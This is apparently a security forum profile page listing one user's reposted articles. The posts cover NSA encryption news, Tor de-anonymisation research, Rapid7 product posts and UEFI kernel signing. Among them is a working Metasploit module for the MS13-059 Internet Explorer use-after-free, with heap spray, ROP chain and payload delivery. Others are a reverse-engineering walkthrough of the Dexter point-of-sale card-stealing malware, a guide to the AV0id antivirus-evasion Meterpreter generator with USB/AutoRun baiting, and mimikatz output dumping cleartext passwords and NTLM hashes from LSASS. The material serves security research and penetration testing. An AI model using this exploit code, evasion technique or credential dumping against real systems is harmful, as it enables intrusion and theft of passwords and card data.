Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=2]September 5, 2013[/h] [h=3]The NSA Is Breaking Most Encryption on the Internet[/h] The new Snowden revelations are explosive. Basically, the NSA is able to decrypt most of the Internet. They're doing it primarily by cheating, not by mathematics. It's joint reporting between the Guardian, the New York Times, and ProPublica. I have been working with Glenn Greenwald on the Snowden documents, and I have seen a lot of them. These are my two essays on today's revelations. Remember this: The math is good, but math has no agency. Code has agency, and the code has been subverted. Sursa: Schneier on Security: The NSA Is Breaking Most Encryption on the Internet
  2. Nytro
    TOR Should not be solely Used for privacy Posted by: FastFlux September 5, 2013 The Tor network has been getting a lot of attention lately. About two weeks ago, the number of users on the anonymous network mysteriously doubled, hitting a record high. It could be because of the new Pirate Bay’s new Tor-powered browser. It could also be a result of recent web censorship by the Russian government. Or it could be new malware that is utilizing the network to hide their Command and Control (C&C) servers. A new report from the US Naval Research Laboratory and Georgetown University in Washington DC called “Users Get Routed: Traffic Correlation on Tor by Realistic Adversaries.” Researchers claim that It is not very difficult to expose the bulk of user’s identities if an attacker is willing to put in the time and effort, according to the Register. It’s even easier for government and spy agencies that have money to do so. So, how bad is the security risk? The study found that even if an attacker had no control routers, 80 percent of Tor users could be de-anonymized within six months. With control of one exchange point, or autonomous systems (AS), around 100 percent of users were likely to be uncovered, within three months. With two, it could take just one day. “These results are somewhat gloomy for the current security of the Tor network,” researchers wrote, adding that “Current users of Tor should carefully consider if it meets their security needs.” Sursa: http://zerosecurity.org/technews/tor-solely-privacyTOR Should not be solely Used for privacy
  3. Nytro
    [h=3]Point-of-Sale Malware: Infostealer.Dexter[/h] Haven't posted since a while so let's do something... Back on some old material, due to a 'recent' compromission of off-sho.re servers, and the circulation between AVs of Cyberbunker sinkholes logs. (Especially the Alina connections was interesting, but that not the topic) Did you remember Dexter ? nah not the TV Series, but the PoS Malware. Systems infected by Dexter are various in our case (gas stations, pawn shops, logistics, luxury shops, doctors, clinics, pharma, labs, etc...) This malware was coded by a guys know as 'dice' (there was an advert on Darkode made by him around November 2012 if i remember, but he requested an admin to remove the thread so it's not anymore available) Visa USA have released an alert one month after. Sample who come from the compromised server: Let's see so, i will avoid you the Visual Basic 6 unpacking step, if you want the hashs. Original: bb0b17c2f66a868cf1e8a46626366a32 Depack: e74593552b66a4638b80a4fbf2fb7438 Create a mutex: Determine if we are under x64: Creat a suspended process of IE: Copy the EXE in memory: WriteProcess Memory on Internet Explorer with the content of the exe: Then he a do a CreateRemoteThread on IE and ExitThread on this process. Ok, what's happend with the injected IE ? I've patched the executable by taking some jumps he have not took at the begining to make it think we are in IE and see what's happend. Create a subkey 'HelperSolutions Software': Create a folder %APPDATA%/Java Security Plugin then CopyFile and do a DeleteFile on the original exe. Do a RegCreateKey/RegSetValue/RegCloseKey with 'digit' as registry entry and 'cc98afca-1a04-4c5d-80cf-1cc78244b63e' as value for me. Create a registry persistance 'Sun Java Security Plugin': Do the same but this time in HKCU: Create another registry entry but this time: HKCU Software\Microsoft\Windows\CurrentVersion\Policies\Associations With 'LowRiskFileTypes' and '.exe;.bat;.reg;.vbs;' as value The 'Policies\Associations' subkey lets you manage the default risk level for file attachments (Low-risk/Medium-risk/High-risk file types) The attachment manager in windows can help protect your computer from unsafe attachments that you might receive with an e-mail message and from unsafe files that you might save from the Internet. Edit a value at HKCU: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Registry entry '1806' and '0' as value '1806' is the registry entry about launching applications and unsafe files in internet explorer. The value can be zero, one, or three, typically, a setting of zero sets a specific action as permitted, a setting of one causes a prompt to appear and a setting of three prohibits the specific action. Do the same operation but in HKLM this time: The file initialyse a thread: Extract a ressource: Create a DLL 'SecureDll.dll' with the extracted ressource and attribute Hidden: Load the dll: Create a path: Create a reg key at Software\HelperSolutions Software 'val1' and with value 'C:\Documents and Settings\Administrateur\Bureau\strokes.log' Create a second reg key at Software\HelperSolutions Software 'val2' and with value 'C:\Documents and Settings\Administrateur\Bureau\tmp.log' Hook the keyboard: Refer to the MSDN for explanation: Okay... let's have a look on what's this SecureDll.dll do, seem it's not that secure. Look for previous reg key: val1 and val2. Look for some specific process who run on the system: Here is a list: wmiprvse.exe (Microsoft Windows Management Instrumentation) LogonUI.exe (Windows LogOn User Interface) svchost.exe (Service Host Process) iexplore.exe (Internet Explorer) explorer.exe (generic Windows process) System (Internal Windows system process) smss.exe (Session Management Subsystem) csrss.exe (Client/Server Runtime Subsystem) winlogon.exe (Windows LogOn Process) lsass.exe Local (Security Authority Subsystem Service) spoolsv.exe (Printer Spooler Service) alg.exe (Application Layer Gateway) wuauclt.exe (Windows Update client for WindowsME) firefox.exe chrome.exe devenv.exe (Microsoft Visual Studio) Then he start to open process and look for track1/2/3 And when finaly something is detected: Make it as string: After looking at all process he will create some threads: The first will just do a new scan of process. Second thread make sure everything is ok with the registry key 'run' Tree do a loop 4 detect if the pc will got shutdown (i've not looked but DetectShutdownClass seem enought explicit) Then he start to enter in a procedure to call home: Get user name: Get the computer name: Get the OS version: Architecture: Retrieve the string used to identify the machine who was stored on the registry database (cc98afca-1a04-4c5d-80cf-1cc78244b63e) Open strokes.log and read it Then Delete it: Read the content of tmp.log: Enter in a decode routine: Create a file Debug.log: Write it: And delete tmp.log: Take our hwid and enter on the routine to code it: Then he will do that again but with the process name he grabbed tracks info, take also pc infos etc... From the original source code: At the end we have a huge strings like: page=RUUZTk9FSURRTk1OHVFIGBhJUUQYRUpRSkQaTUwYSUhNTx0f&ump=ACgZHREqFRkLGQ4jLxkOChUfGVIZBBlGR0hNTU1NTU1NTU1NTU1NTU1BTU9MS01MTUxMTExMTExMTExKSkpDWT5ITU1NTU1NTU1NTU1NTU1NIiQlMDU+MyRTMD0+L1wxLiJNT0xLTUxNTExMTExMTExMTExMTExMTExMTExKSkpMTE C&C domain and gate path are given via pointers due to the internet explorer injection. After having called the gateway, then Dexter do a 600000 ms sleep (10 mins): And do the shit again, then re-call home each 10 mins. Now about the C&C responses, i noticed these actions update- chekin: scanin: unistall download- I've not searched how works the following commands, Josh Grunzweig of SpiderLabs already explained it. So... enough boring reversing infos, let's have a look on the panel now. Login: Dashboard: More than 3000 bots, most of them are commercial machines. Like Alina, Dexter use colors code, dead bots appear in red and recent dead bots in blue: Dumps (stolen credit cards): Keylogger logs (here, that seem to be a UPS dispatch center, or something like this): Process viewer (not working): Another but small Dexter panel: I've found also an older version of Dexter, i thought it was Alina at first but nope, Dexter v1: Dashboard: Dumps: Bots: Process list (this time it work): Uploader was not found due to a programming error: Dexter 'v2' C&C structure: Just ignore the 'installer' folder that something homemade for a video .Get track type function: That even grab track3. 600 posts reached Posted by Steven K at 23:09 Sursa: XyliBox: Point-of-Sale Malware: Infostealer.Dexter
  4. Nytro
    Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow Authored by Vitaliy Toropov | Site packetstormsecurity.com A heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. The exploit for this vulnerability is javascript code which shows how to use it for memory corruption of internal JS objects (Unit32Array and etc.) and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted into the JS code). This exploit affects Apple Safari version 6.0.1 for iOS 6.0 and OS X 10.7/8. Earlier versions may also be affected. It was obtained through the Packet Storm Bug Bounty program. Download: http://packetstormsecurity.com/files/download/123088/PSA-2013-0903-1-exploit.tgz Sursa: Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow ? Packet Storm
  5. Nytro
    MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free Authored by corelanc0d3r, sinn3r | Site metasploit.com This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This Metasploit module can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, but not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by a InsertButton (or Insert-whatever) command, which is also responsible for the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: It is also possible to see a different object being freed and used, doesn't always have to be CFlatMarkupPointer. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", 'Description' => %q{ This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8 requires a different way to trigger the vulnerability, but not currently covered by this module. The issue is specific to the browser's IE7 document compatibility, which can be defined in X-UA-Compatible, and the content editable mode must be enabled. An "onmove" event handler is also necessary to be able to trigger the bug, and the event will be run twice before the crash. The first time is due to the position change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable' object is created during a "SelectAll" command, and this object will be used later on for the crash. The second onmove event seems to be triggered by a InsertButton (or Insert-whatever) command, which is also responsible for the free of object CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and then passes this on to the next functions (GetLineInfo -> QIClassID). When this reference arrives in function QIClassID, an access violation finally occurs when the function is trying to call QueryInterface() with the bad reference, and this results a crash. Successful control of the freed memory may leverage arbitrary code execution under the context of the user. Note: It is also possible to see a different object being freed and used, doesn't always have to be CFlatMarkupPointer. }, 'License' => MSF_LICENSE, 'Author' => [ 'corelanc0d3r', # Vuln discovery, PoC 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3184' ], [ 'OSVDB', '96182' ], [ 'MSB', 'MS13-059' ], [ 'BID', '61668' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-194/' ], [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-195/' ] ], 'Platform' => 'win', 'Targets' => [ # Vulnerable IE9 tested: 9.0.8112.16446 [ 'Automatic', {} ], [ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Jun 27 2013", 'DefaultTarget' => 0)) end def rnd_dword rand_text_alpha(4).unpack("V").first end def get_fake_obj # edx,dword ptr [eax] # ... # call edx obj = [0x20302020].pack("V*") # EAX points to this (Target spray 0x20302020) obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") obj << [rnd_dword].pack("V*") return obj end # Target spray 0x20302020 # ESI is our fake obj, with [esi]=0x20302020, [esi+4]=0x42424242, so on # eax=20302020 ebx=80004002 ecx=0250d890 edx=cccccccc esi=03909b68 edi=0250d8cc # eip=cccccccc esp=0250d87c ebp=0250d8a8 iopl=0 nv up ei ng nz na po cy # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283 # cccccccc ?? ??? def get_payload code = '' code << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 code << "\x61\x9d" # popad; popfd code << payload.encoded stack_pivot = [ 0x7c342643, # xchg eax, esp; pop edi; add [eax], al, pop ecx; ret 0x0c0c0c0c ].pack("V*") p = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) return p end def is_win7_ie9?(agent) (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/) end # The meta-refresh seems very necessary to make the object overwrite more reliable. # Without it, it only gets about 50/50 def get_html(cli, req) js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch)) js_payload = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch)) html = %Q| <html> <meta http-equiv="X-UA-Compatible" content="IE=7"/> <meta http-equiv="refresh" content="2"/> <head> <script language='javascript'> #{js_property_spray} var fake_obj = unescape("#{js_fake_obj}"); var s = unescape("#{js_payload}"); sprayHeap({shellcode:s}); function setupPage() { document.body.style.position = 'absolute'; document.body.contentEditable = 'true'; document.body.style.right = '1'; } function hitMe() { document.execCommand('SelectAll'); document.execCommand('InsertButton'); sprayHeap({shellcode:fake_obj, heapBlockSize:0x10}); document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}'; } </script> </head> <body onload="setupPage()" onmove="hitMe()" /> </html> | html.gsub(/^\t\t/, '') end def on_request_uri(cli, request) if is_win7_ie9?(request.headers['User-Agent']) print_status("Sending exploit...") send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) else print_error("Not a suitable target: #{request.headers['User-Agent']}") send_not_found(cli) end end end Sursa: MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free ? Packet Storm
  6. Nytro
    [h=1]Federal Friday - 8/30/2013: DHS/FBI Highlight The Importance Of Keeping Android Devices Updated[/h]Posted by Sajal Sahay in Information Security on Aug 30, 2013 3:08:58 PM A memo sent to Police, Fire and EMS personnel nationwide from the FBI and Department of Homeland Security earlier this summer, was recently made public. According to the memo, the Android operating system is the primary target for mobile malware attacks. At face value, this would not be surprising given that Android commands ~ 80% market share in the US, so should proportionally experience the largest number of malware attacks. However, the same report says that iOS was targeted < 1% of the time, which is well below Apple’s market share. So, what’s the difference? The real insight comes later in the report. “Industry reporting indicates 44% of Android users are still using versions 2.3.3 through 2.3.7 – known as Gingerbread – which were released in 2011 and have a number of security vulnerabilities that were fixed in later versions.” Rapid7’s mobile customer database shows that 49% of Android devices contain at least one high severity vulnerability, aligning closely with the % of devices with older versions of OS still running on them. So, the most effective way for organizations to eliminate these vulnerabilities is to ensure all employee devices are updated to the latest OS version. However, because the mobile ecosystem is so complex and OS updates require coordination between handset manufacturers, OS vendors and carriers, these updates can sometimes take months to deploy and create large windows of risk. Even the ACLU has gotten involved, accusing the major US carriers of deceptive business practices due to untimely updates of Android devices. See our previous blog on this topic. Rapid7 has an answer to this problem. Our Mobilisafe mobile risk management solution makes it easy for organizations to help their employees update their devices. Mobilisafe identifies the mobile devices connecting to organizational data, and assesses each device for its vulnerability risk and if they are eligible for an OS update. For those devices that can be updated, Mobilisafe automatically sends emails to the employee, with direct links to the OEM site where the device update can be completed. Policies can also be created that block devices from accessing organizational data if the update is not completed within a set period of time. For a free demo of Mobilisafe, click here, and our usual Federal Blogger John Schimelpfenig will be back next week. Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/dhsfbi-highlight-the-importance-of-keeping-android-devices-updated
  7. Nytro
    [h=1]Rapid7 Free Tools - Download Today![/h]Posted by Patrick Hellen in Information Security on Aug 30, 2013 12:06:08 PM Hello all, It’s your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you; Rapid7’s suite of Free Security Tools. If you're a one man shop, trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I’m sure one or more of these tools would be an excellent addition to your existing security portfolio. Here’s a list of our own Portfolio. Click on the links to get some additional information, and to download the licenses. Nexpose Community Edition: Our original tool - Nexpose is a vulnerability scanning software that is the best in the business. Don't take my word for it though. To see how excellent it is, download the community edition, and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste-test available with the community edition will be more than enough to prove it's value. Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks, and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more. Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14 day trial, and learn how easy it is to keep the risk of the mobile devices on your network low. RiskRater: Our newest free tool, RiskRater is a survey that will measure your mobile, endpoint, and user based risk, in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18 question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compares. Also, each question you answer provides you with real and actionable follow up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download - just click to launch the tool, and get a good spot check on your real risk. Metasploitable: If you're new to Penetration Testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system # 1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, and intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a, "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started. ScanNow - MySQL: The MySQL Vulnerability CVE-2012-2122, best described in HD Moore post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quicky and easily check to see if your MySQL servers are vulnerable, just click and download and run the test yourself. ScanNow - UPnP: This free ScanNow scanner checks your network enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimates upwards of 50 Million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool, to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potential damaging security flaw. UPnP Router Check: Want a quick router scan to check on the status of UPnP enabled devices? Click here and run a scan quickly and easily. This will only check your router exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status. And finally, BrowserScan: This free tool enables your organazation to check on the browsers currently in use, and allows you to identify the risk of out of date items, unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site, to look up all the browsers in use, and can even return analytics to show you how you're addressing your risk over time. I also recommend that you check out Kali Linux - by Offensive Security, the same team that brought you Backtrack. Kali Linux, the upgraded Backtrack, is a debian derived Linux distrubition that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component to the download. Visit Offensive Security to learn more. All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly, it can take as little as 10 seconds in some cases to find at your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it? Now I know that's a lot to take in and review, so if you've got any questions about these products - or if you're currently using them, and you'd be willing to share some of your best practices or tips on how they've worked sucessfully in your own environments, please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have. Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you? Thanks all, and feel free to drop me a line here if you'd like to discuss offline Patrick Hellen Sursa: https://community.rapid7.com/community/infosec/blog/2013/08/30/rapid7-free-tools--download-today
  8. Nytro
    AV0id – Anti-Virus Bypass Metasploit Payload Generator Script by Common Exploits Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempted to avoid A.V, credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier. What it does it generator a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/Phishing attacks, or burn to a CDROM for some AutoRun fun. There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting a AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quite script that did get round it. Even if you are not looking to get around A.V, or this gets detected more in the future it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener. Some screen shots, download path and A.V bypass script comparisons below. At its best my script was only detected by 10 out of 46 Anti-Virus products, these depends on which stealth option you use. At its lowest it was about 14/15 A.V products found this. This is still bypasses 20+ more products than just encoding the payload using Mfsencode or Msfvenom. It uses Msfencode, but also pads the file and re-compiles the executable including a PDF icon. The file size and contents are never the same for every executable generated, this helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up. Download from the NCC Open Source GitHub Repository below: https://github.com/nccgroup/metasploitavevasion Tested on Backtrack 5 and Kali only. Run as root. Exploit on victim now opens minimised, thanks to @redmeat_uk for the info. It requires two very small files in order to create the PDF icon and AutoRun files. It will auto download these if they are not within the directory. If it can’t download them it will continue, but it will not create the PDF icons. If you want to download these two files in advance, just get them below. Place in the same directory as the script is stored. If you want to change the autorun.ico for your own icon this will change the autorun icon. To change the exe icon is a little more complex and is compiled from the icon.res file. Google around and you can create this using windres. wget http://www.commonexploits.com/tools/avoid/autorun.ico MD5 checksum: ebe763172e90b7f218d522b13abbc5c1 wget http://www.commonexploits.com/tools/avoid/icon.res MD5 checksum: 876caf8703c803d7a2359103adc9ce58 Select local system or remote. If you select local it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end. Enter the port number to listen on. If local it doesn’t really matter, but if external they may have some restrictions so try port 80, 443 or 53. A recent test I found workstations could talk directly outbound on DNS/53, so I could get a AutoRun shell out to the internet. There are 5 options for the payload. The more stealthy the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue i.e using a CD or USB then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit. It then saves you out the executable named salaries.exe, you can change the name in the top of the script header. You could use this and place on a few USB sticks and leave around the building, I am sure curious staff may want to open, and as it has a PDF icon it helps. It also creates you an autorun directory, simply burn these to a CDROM to try a AutoRun shell or a U3 USB – normal USB sticks won’t AutoRun and obviously if the system has AutoRun disabled it will not work. It will then launch the listener locally. Or if you selected an alternative system, it will give you the code to copy and paste to start the listener. Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction. I run this over 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts. Standard Metasploit payload (encoded) Shell Code Exec Vanish Script AV0ID Syringe Quick high level view on the above scripts. Shell Code Exec Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this. Info here: Bernardo Damele A. G.: Execute Metasploit payloads bypassing any anti-virus Download here: https://github.com/inquisb/shellcodeexec This is also built into SET (Social Engineering Toolkit) under the media generator options. Vanish Script Great script that inspired my script. Created originally by Astr0baby in 2011 and modified by Vanish3r that generates the Metasploit payload for you. It is getting more detected now. Download here: [bash] Vanish Script - Pastebin.com Syringe This works in a very similar way to Shellcode exec, but I found this to be very good and got round a lot of A.V products. This was the only tool that got around Microsoft A.V in my testing. Download here: https://code.google.com/p/syringe-antivirus-bypass/ Sursa: AV0id – Anti-Virus Bypass Metasploit Payload Generator Script | Common Exploits - Penetration Testing Information
  9. Nytro
    [h=1]mimikatz: Tool To Recover Cleartext Passwords From Lsass[/h] I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */ mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 488 Attente de connexion du client... Serveur connecté à un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des données de sécurités dans LSASS mimikatz # @getLogonPasswords Authentification Id : 0;434898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password Authentification Id : 0;269806 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Tool: mimikatz | Blog de Gentil Kiwi Sursa: mimikatz: Tool To Recover Cleartext Passwords From Lsass | pentestmonkey
  10. Nytro

    java

    Nytro replied to thekidno1's topic in Off-topic

    Netbeans, Eclipse? Cica asta ar fi smecher, dar e trial: http://www.jetbrains.com/idea/download/ Nu l-am incercat.
  11. Nytro
    Nu iti inteleg opinia. Nu furi de la sistem, furi de la oameni. Gandeste-te ca lu nevasta-ta (zic ca idee) ii fura un tigan portofelul pe strada. Ce faci? Te duci la el si il feliciti ca e impotriva sitemului, ca nu respecta legile? Daca ai muncit si tu la un proiect, ai facut 300 de dolari pe el, ii ai pe PayPal si ti-i fura cineva, ii mai trimiti tu 20 de dolari, sa isi ia o sticla de whiskey, ca e impotriva sistemului? La fel e si aici, nu furi niciun sistem, furi de la alti oameni, oameni care nu sunt ca tine, ci oameni care au muncit pentru banii aia. Cum ati stat pana la 30 de ani cu mama si cu tata si ati mancat seminte in fata blocului, deci cum habar nu aveti cum se fac banii, normal, nu stiti ce inseamna sa muncesti. Nu ma refer la tine, am folosit persoana a II-a la modul general. Dar am cateva intrebari: cati ani ai? cati ani ai muncit? Eu sunt de acord cu anumite lucruri, pe intelesul tuturor: 1. spargerea site-urilor - Club Show Off 2. schimbul de "bunuri si servicii" - RST Market 3. crearea de malware - Analiza malware Nici lucrurile astea nu sunt legale, dar: 1. cea mai buna metoda de a invata securitate web asta e 2. faci rost de bani pentru care, practic, nu ai furat pe nimeni 3. la fel ca la primul punct, daca vrei sa fii un bun malware researcher, trebuie sa stii sa scrii cateva linii de cod In toate aceste cazuri, nu FURI de la nimeni. Sigur, lucrurile de mai sus nu sunt legale si raspundeti pentru actiunile voastre, dar nu sunt la fel de grave ca a fura banii oamenilor care merg la Subway. Si eu mai merg la Subway, cum ar fi sa ma trezesc ca raman fara bani pe card dupa ce imi cumpar un sandvish? Pai daca il prind pe ala il calc pe cap.
  12. Nytro
    Booting a Self-signed Linux Kernel Now that The Linux Foundation is a member of the UEFI.org group, I’ve been working on the procedures for how to boot a self-signed Linux kernel on a platform so that you do not have to rely on any external signing authority. After digging through the documentation out there, it turns out to be relatively simple in the end, so here’s a recipe for how I did this, and how you can duplicate it yourself on your own machine. We don’t need no stinkin bootloaders! When building your kernel image, make sure the following options are set: CONFIG_EFI=y CONFIG_EFI_STUB=y ... CONFIG_FB_EFI=y ... CONFIG_CMDLINE_BOOL=y CONFIG_CMDLINE="root=..." ... CONFIG_BLK_DEV_INITRD=y CONFIG_INITRAMFS_SOURCE="my_initrd.cpio" The first two options here enable EFI mode, and tell the kernel to build itself as a EFI binary that can be run directly from the UEFI bios. This means that no bootloader is involved at all in the system, the UEFI bios just boots the kernel, no “intermediate” step needed at all. As much as I love gummiboot, if you trust the kernel image you are running is “correct”, this is the simplest way to boot a signed kernel. As no bootloader is going to be involved in the boot process, you need to ensure that the kernel knows where the root partition is, what init is going to be run, and anything else that the bootloader normally passes to the kernel image. The option listed above, CONFIG_CMDLINE should be set to whatever you want the kernel to use as the command line. Also, as we don’t have an initrd passed by the bootloader to the kernel, if you want to use one, you need to build it into the kernel itself. The option CONFIG_INITRAMFS_SOURCE should be set to your pre-built cpio initramfs image you wish to use. Note, if you don’t want to use an initrd/initramfs, don’t set this last option. Also, currently it’s a bit of a pain to build the kernel, build the initrd using dracut with the needed dracut modules and kernel modules, and then rebuild the kernel adding the cpio image to the kernel image. I’ll be working next on taking a pre-built kernel image, tearing it apart and adding a cpio image directly to it, no need to rebuild the kernel. Hopefully that can be done with only a minimal use of libbfd After setting these options, build the kernel and install it on your boot partition (it is in FAT mode, so that UEFI can find it, right?) To have UEFI boot it directly, you can place it in /boot/EFI/boot/bootx64.efi, so that UEFI will treat it as the “default” bootloader for the machine. Lather, rinse, repeat After you have a kernel image installed on your boot partition, it’s time to test it. Reboot the machine, and go into the BIOS. Usually this means pounding on the F2 key as the boot starts up, but all machines are different, so it might take some experimentation to determine which key your BIOS needs. See this post from Matthew Garrett for the problems you might run into trying to get into BIOS mode on UEFI-based laptops. Traverse the BIOS settings and find the place where UEFI boot mode is specified, and turn it the “Secure Boot” option OFF. Save the option and reboot, the BIOS should find the kernel located at boot/EFI/boot/bootx64.efi and boot it directly. If your kernel command line and initramfs (if you used one) are set up properly, you should now be up and running and able to use your machine as normal. If you can’t boot properly, ensure that your kernel command line was set correctly, or that your initramfs has the needed kernel modules in it. This usually takes a few times back and forth to get all of the correct settings properly configured. Only after you can successfully boot the kernel directly from the BIOS, in “insecure” mode should you move to the next step. Keys to the system Now that you have a working kernel image and system, it is time to start messing with keys. There are three different types of UEFI keys that you need to learn about, the “Platform Key” (known as a “PK”), the “Key-Exchange Keys” (known as a “KEK”), and the “Signature Database Key” (known as a “db”). For a simple description of what these keys 